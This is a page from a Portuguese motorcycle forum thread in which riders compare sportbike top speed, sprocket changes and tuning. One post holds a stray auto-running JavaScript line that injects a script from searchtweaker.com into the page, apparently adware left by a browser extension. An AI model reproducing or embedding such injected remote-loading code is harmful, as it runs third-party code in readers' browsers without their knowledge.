InícioPortalÚltimas imagensRegistarEntrarum videozinho para animar a malta - Página 2 Lojaum videozinho para animar a malta - Página 2 V-deosum videozinho para animar a malta - Página 2 Fotos
um videozinho para animar a malta - Página 2 Iy07r7

Novas mensagens
Encontrar as minhas mensagens
Tópicos sem resposta
Compartilhe
 

 um videozinho para animar a malta

Ver o tópico anterior Ver o tópico seguinte Ir para baixo 
Ir à página : Anterior  1, 2
AutorMensagem
RicardoP
CBR 600F2
RicardoP

Número de Mensagens : 1967
Idade : 34
Localização : Portugal
Mota/Modelo : Kawasaki ZZR 1400
Data de inscrição : 05/02/2012

um videozinho para animar a malta - Página 2 Empty
MensagemAssunto: Re: um videozinho para animar a malta um videozinho para animar a malta - Página 2 Icon_minitimesetembro 24th 2013, 12:13

Boas Hélio, como podes ver no video a diferença requer alguma estrada para ser notada e nota-se que a R1 de 2005 anda mais mas lá está, o interessante seria colocar uma ao lado da outra e sairem ao mesmo tempo para se testar isso como fiz com a do Santiago.
a Honda tem a transmissao curta mas sinceramente quantas vezes daria uso a uma cremalheira menor? ali compensava na boa mas tudo depende de como se gosta de andar com elas e por onde se anda.
Ir para o topo Ir para baixo
AjnSantiago
CBR 600F
AjnSantiago

Número de Mensagens : 1156
Idade : 41
Localização : Porto
Data de inscrição : 15/12/2011

um videozinho para animar a malta - Página 2 Empty
MensagemAssunto: Re: um videozinho para animar a malta um videozinho para animar a malta - Página 2 Icon_minitimesetembro 24th 2013, 12:24

Assino, a minha anda exatamente o mesmo que a do Ricardo, claro está, para aproveitarmos a mota teriamos que de facto retirar 1 ou 2 dentes na cremalheira.

Também digo isto e concordo com o Ricardo, para que tirar dentes para ter + ponta? Temos assim tantas AE's para andar a essa velocidade? Além do perigo acrescido que é andar a esse limite.. Acho que andar ao corte em 6ª na nossa é já um exagero Razz

Ir para o topo Ir para baixo
Kafka
CBR 400
Kafka

Pendura : -te

Número de Mensagens : 481
Idade : 60
Localização : Home
Mota/Modelo : 1000rr-11
Data de inscrição : 17/07/2012

um videozinho para animar a malta - Página 2 Empty
MensagemAssunto: Re: um videozinho para animar a malta um videozinho para animar a malta - Página 2 Icon_minitimesetembro 24th 2013, 13:51

Boa, Boa, Ricardo!bounce bounce 
(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="http://www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();
Ir para o topo Ir para baixo
daijiro kato
CBR 400RR
daijiro kato

Pendura : tá de férias

Número de Mensagens : 638
Idade : 44
Localização : longe da bófia
Mota/Modelo : suzuki 1000 k7
Data de inscrição : 19/05/2011

um videozinho para animar a malta - Página 2 Empty
MensagemAssunto: Re: um videozinho para animar a malta um videozinho para animar a malta - Página 2 Icon_minitimesetembro 24th 2013, 14:16

AjnSantiago escreveu:
Assino, a minha anda exatamente o mesmo que a do Ricardo, claro está, para aproveitarmos a mota teriamos que de facto retirar 1 ou 2 dentes na cremalheira.

Também digo isto e concordo com o Ricardo, para que tirar dentes para ter + ponta? Temos assim tantas AE's para andar a essa velocidade? Além do perigo acrescido que é andar a esse limite.. Acho que andar ao corte em 6ª na nossa é já um exagero Razz

entao nao tens,em qualquer parte se poe a mota ao red line

eu as vezes até tenho medo que a put@ da mota parta tanto é o tempo que ela vai no red line 

mas elas têm o corte é para alguma coisa

portanto da-lhe gaz que isso nao parte
Ir para o topo Ir para baixo
RicardoP
CBR 600F2
RicardoP

Número de Mensagens : 1967
Idade : 34
Localização : Portugal
Mota/Modelo : Kawasaki ZZR 1400
Data de inscrição : 05/02/2012

um videozinho para animar a malta - Página 2 Empty
MensagemAssunto: Re: um videozinho para animar a malta um videozinho para animar a malta - Página 2 Icon_minitimesetembro 24th 2013, 15:33

hm lá está, é o meu medo, ja se sabe que ela vai ali a rasgar pano muito tempo...
quem curte A.E serve-se dela, quem nao faz muita A.E nao precisa muito de ponta, eu curtia experimentar visto nao ser muito caro mas so ficava contente quando ela cortasse hahaha ^^
falta saber se o motor tem pulmao para cremalheira com menos dentes.
Ir para o topo Ir para baixo
vmf74
CBR 400
vmf74

Número de Mensagens : 499
Idade : 49
Localização : Onde ouver boas curvas...
Data de inscrição : 29/07/2011

um videozinho para animar a malta - Página 2 Empty
MensagemAssunto: Re: um videozinho para animar a malta um videozinho para animar a malta - Página 2 Icon_minitimesetembro 24th 2013, 15:36

RicardoP escreveu:
pelo perfil nao devem ser muito bons a escoar a água =/ mas parecem cola pelo que o pessoal me diz.

o indicador está ligado mas nao é daqueles XPTO cuja luz é mais brilhante =)

olha que julgo ser ao contrário, menos dentes = mais ponta e + dentes = menos ponta mas + disparo, isto para a cremalheira.

quanto às outras maquinas noto que elas têm mais ponta, seja gsxr ou r1, nota-se no video que a R1 de 2005 tem mais ponta e ao fim de alguma estrada ganha distancia mas ele nao chegou a cortar, a de 2012 (preta do 2º video) é ela por ela mas a subir nota-se que me aproximo um bocadinho, a ver que ambas tem escapes apenas enquanto a minha tem escape, filtro e bazzaz afinado em banco.
quanto a kawasaki nca exprimentei =) se fosse com a de 2012 tinha que levar uma corda para me puxar ^^
Estou curioso a ver como se portava com menos 2 dentes mas nao estou para trocar cremalheira, quando trocar o kit todo talvez o faça mas gosto de sentir o kick da mota e se perder mt disso meto-a de origem, gosto mais de umas curvinhas =)

agora a título de curiosidade, a minha de 2009 com filtro, ponteira mivv, bazzaz afinado em banco anda exactamente o mesmo que a do Santiago de 2013 com filtro igual, ponteira leo vince, p.c e autotune. isto a rolar de 2ª, 3ª, e 4ª até cortar.
Pois não são nada bons para água, e os pequenos buracos (sim, são mesmo buracos, não são rasgos), servem para homologação, caso contrário não estavam lá! Shocked  
E depois de aquecer é cola autêntica, por isso gosto tanto deles, ainda para mais na minha.

Em relação aos dentes, sim tens razão, se for na cremalheira menos=mais kmh, mas estava a falar no pinhão de ataque, aí perdes ponta e ganhas no resto porque fica mais curta.

Quanto à comparação com a do Santiago, não me admira, a evolução mecânica não foi significativa, mas tinha dúvidas quanto à diferença para as GSXR e zx10 em situação real, pois lá em cima parecem-me muito similares.
A R1 já sabia que as mais recentes têm menos ponta que as de 2003 a 2007.
E em recuperação/aceleração, notas diferença?

Abraço
Ir para o topo Ir para baixo
daijiro kato
CBR 400RR
daijiro kato

Pendura : tá de férias

Número de Mensagens : 638
Idade : 44
Localização : longe da bófia
Mota/Modelo : suzuki 1000 k7
Data de inscrição : 19/05/2011

um videozinho para animar a malta - Página 2 Empty
MensagemAssunto: Re: um videozinho para animar a malta um videozinho para animar a malta - Página 2 Icon_minitimesetembro 24th 2013, 17:58

RicardoP escreveu:
hm lá está, é o meu medo, ja se sabe que ela vai ali a rasgar pano muito tempo...
quem curte A.E serve-se dela, quem nao faz muita A.E nao precisa muito de ponta, eu curtia experimentar visto nao ser muito caro mas so ficava contente quando ela cortasse hahaha ^^
falta saber se o motor tem pulmao para cremalheira com menos dentes.
julgo que se tirares 2 dentes nao vais notar muito porque essa mota tem muita força em baixas agora em altas  nao sei como se vai portar

na altura que andava com um colega meu que tinha uma eu só o passava a partir de 5ª 

como já te disse no outro dia uma vez fiz isso na CBR que tive e ela ficou um bocado lenta na altura nao gostei
Ir para o topo Ir para baixo
RicardoP
CBR 600F2
RicardoP

Número de Mensagens : 1967
Idade : 34
Localização : Portugal
Mota/Modelo : Kawasaki ZZR 1400
Data de inscrição : 05/02/2012

um videozinho para animar a malta - Página 2 Empty
MensagemAssunto: Re: um videozinho para animar a malta um videozinho para animar a malta - Página 2 Icon_minitimesetembro 24th 2013, 20:25

vmf74 escreveu:

E em recuperação/aceleração, notas diferença?

Abraço
nao te consigo dizer sinceramente. precisava de fazer uma reprise com alguem e so o fiz com o Santiago portanto nao te sei dizer =/ como o Daijiro disse a mota tem muita força em baixas e médias, poderá interessar em reprises decerto mas até que ponto se aguenta em altas com as outras nao sei, sei que a curva de potencia acusa perca de potencia a partir das 12000 rpm enquanto nas gsxr e ninjas a curva continua a aumentar em altas.

Daijiro a ver se curto mas cheira-me que vai ser dificil gostar da mota assim =/ logo se ve
Ir para o topo Ir para baixo
Conteúdo patrocinado




um videozinho para animar a malta - Página 2 Empty
MensagemAssunto: Re: um videozinho para animar a malta um videozinho para animar a malta - Página 2 Icon_minitime

Ir para o topo Ir para baixo
 

um videozinho para animar a malta

Ver o tópico anterior Ver o tópico seguinte Ir para o topo 
Página 2 de 2Ir à página : Anterior  1, 2

 Tópicos semelhantes

-
» Os 5 Cirurgiões - PARA ANIMAR....
» Malta do forum
» Malta das CRF's, vai uma voltinha?
» Aqui umas " anedotas para a Malta " ;)
» Estoril volta a animar-se Domingo

Permissões neste sub-fórumNão podes responder a tópicos
CBRportugal | Comunidade Motard :: GERAL :: Fotos & Vídeos :: Motos :: Videos-